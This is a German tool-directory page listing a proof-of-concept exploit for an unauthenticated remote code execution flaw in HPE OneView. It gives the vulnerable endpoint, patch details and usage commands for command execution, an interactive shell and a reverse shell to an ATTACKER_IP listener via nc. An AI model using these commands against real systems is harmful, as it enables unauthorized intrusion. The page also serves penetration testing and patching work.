Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-37164-PoC — Proof-of-Concept-Exploit für CVE-2025-37164, eine kritische nicht authentifizierte Remote-Codeausführungsschwachstelle in HPE OneView über den Endpunkt /rest/id-pools/executeCommand. | Kitploit
Tools/GitHubGitHub/g0vguy/cve-2025-37164-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

Proof-of-Concept-Exploit für CVE-2025-37164, eine kritische nicht authentifizierte Remote-Codeausführungsschwachstelle in HPE OneView über den Endpunkt /rest/id-pools/executeCommand.

Repository anzeigen
629vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-37164 - HPE OneView Unauthenticated RCE PoC

Proof-of-Concept-Exploit für CVE-2025-37164, eine kritische (CVSS 10.0) unauthentifizierte Remote-Codeausführungsschwachstelle in HPE OneView.

HAFTUNGSAUSSCHLUSS

DIESE SOFTWARE WIRD NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.

  • Nur auf Systemen verwenden, die Ihnen gehören oder für die Sie ausdrückliche schriftliche Erlaubnis zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist illegal
  • Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Dieses Tool dient der defensiven Sicherheitsforschung und dem Penetrationstest in kontrollierten Umgebungen

Schwachstellendetails

  • CVE ID: CVE-2025-37164
  • CVSS-Score: 10.0 (KRITISCH)
  • Anbieter: Hewlett Packard Enterprise (HPE)
  • Produkt: HPE OneView (Versionen vor 11.0)
  • Typ: Unauthentifizierte Remote-Codeausführung
  • Patch: Upgrade auf HPE OneView 11.0 oder höher

Technische Analyse: Die Schwachstelle existiert im PUT /rest/id-pools/executeCommand-Endpunkt, der keine Authentifizierung erfordert und benutzergesteuerte Eingaben direkt an Runtime.exec() übergibt.

Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek (pip install requests)
  • Verwundbare HPE OneView-Instanz (mit aktiviertem 'id pools'-Feature)

Verwendung

# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
Tool herunterladen